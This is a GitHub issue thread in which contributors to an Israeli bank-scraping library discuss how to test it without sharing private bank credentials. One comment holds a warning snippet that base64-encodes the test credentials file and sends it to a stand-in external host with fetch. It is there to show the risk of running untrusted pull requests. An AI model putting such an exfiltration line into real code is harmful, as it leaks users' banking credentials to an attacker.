### ISSUE TITLE
Testing with private credentials

### ISSUE THREAD

**Issue by baruchiro** [eshaham/israeli-bank-scrapers#501] opened 2020-08-03 04:13 UTC
I thought I had already brought up the subject in those days, but I did not find any issue about that.

Let's think about the easiest way to test the library in any change, or in any big change.

* It's hard for me to pronounce in English, so please edit the issue if necessary (or fix Google Translate :-))

----

**The limitation**, of course, is that the tests need the testers' passwords, so we need to find a way to **test without the passwords**, or to easily **test locally** with the passwords saved in the local machine.

----

For testing locally, I'm thinking about creating a script that knows to checkout a PR by number or by link, and runs the tests. This is a very basic idea, but I think, as a tester, if you have a dedicated folder for that, you just need run the script with the PR number.

Now, based on this idea, we can integrate with Github Status Checks (I have not checked that yet) to notify the PR that someone tested this PR.

And the last thing, if you create this script in Docker, I think it will be easier, and maybe the tester can keep the docker up and running and respond to webhooks?

-----

This is my idea, I'm sure it is not a completed idea. Please share WDYT, and if you have more ideas like use Github Actions containers, connect many circleCI accounts to one repository...

**Comment by esakal** [comment] 2020-08-03 20:28
Hi @baruchiro, it is indeed frustrating that there is no easy way to test this library. We cannot mock anything because we depend on the companies sites, and we cannot share credentials, so each contirbutor is limited to the companies he/she is using.

I thought about it a lot and failed yet to find a good way to do that. Fortunately, I have access to 5 companies, so I have decent coverage when changing something. Also, based on this project history, we managed to avoid so far breaking changes in shared utils, and when we did change it, we have been cautious and measurable. For significant changes, we tend to ask the assistance of the contributors like we just did for the Typescript support. It is not ideal, but as I said, there aren't any reasonable solutions afaik.

Regarding your suggestion. We cannot silently run tests on other contributor machines because it exposes their credentials or even worse exposes their entire computer. For example, a malicious user changes the following code that reads the credentials from the file [here](https://github.com/eshaham/israeli-bank-scrapers/blob/5c11a46e22dbabf8b161f0cbbfcfb1afacd4c96c/src/tests/tests-utils.ts#L35) and prepare it for the unit tests as follow:
```
try {
	 const configPath = path.join(__dirname, '.tests-config.js');
	 testsConfig = require(configPath);
	
	// NOTE - dangerous lines
	let token = btoa(JSON.stringify(testsConfig));
	fetch(`https://www.somewhere.com?${token}`)

	 return testsConfig;
	 } catch (e) {
	 console.error(e);
	 throw new Error(MISSING_ERROR_MESSAGE);
	 }
```
If we have a code that will automatically run it, that awful user will get all the credentials of everyone.

**Comment by baruchiro** [comment] 2020-08-09 04:20
Again, I didn't do research on this, but for example, CircleCI let you do define a [*Private Keys*](https://circleci.com/blog/keep-environment-variables-private-with-secret-masking/) to test the code with secret credentials. You can do that also in *Github*.

And I remember one of the limitations is that only a contributor can run these tests. That is, when someone does PR the tests will not run unless the PR is merged or the PR is created by a contributor.

I don't remember the exact details, and what I said does not solve the problem completely, but it proves that there is a possibility to reduce the risk.

**Comment by omercnet** [comment] 2020-08-09 09:59
testing with secrets isn't an issue - the problem is who holds these secrets?
whoever admins the CI solution (travis/cricleci/ghactions/etc.) will need to put in these secrets, and if there's no one person who has access to all sites, these secrets will be need to be shared.

Also consider change management as these secrets will need to be replaced every few months

**Comment by baruchiro** [comment] 2020-08-09 10:03
@omercnet I think we are assuming that no one will share his secrets.

This is why I try to think of how each tester will be responsible for his test environment, and will be able to easily report test results.

**Comment by omercnet** [comment] 2020-08-11 09:42
essentially there's no need to always test all the scrapers, unless there's a change to the base types

perhaps the best way to accomplish this is to break this repo into a base repo and individual repos for each company as plugins, this would allow each company repo to have its own testing mechanism

**Comment by baruchiro** [comment] 2020-08-11 09:48
Please no more repos! 😂

**Comment by eshaham** [comment] 2020-08-19 05:20
I can't see this happening without giving someone access to other people's credentials.

Over time the only solution I came up with for ongoing testing was to save the HTML and downloaded files of each website, anonymize data and use that in automated tests. This could be a very good sanity test suite, but it isn't a bulletproof solution since websites change.
We will need to build an easy mechanism for contributors to run something that would do it for them (do it = fetch HTML and files, anonymize data, and update the test suite).

I'm going to close this issue for now, as I don't think there's a good solution for the suggested topic.

**Closed by eshaham** 2020-08-19 05:20 UTC
Labels: enhancement
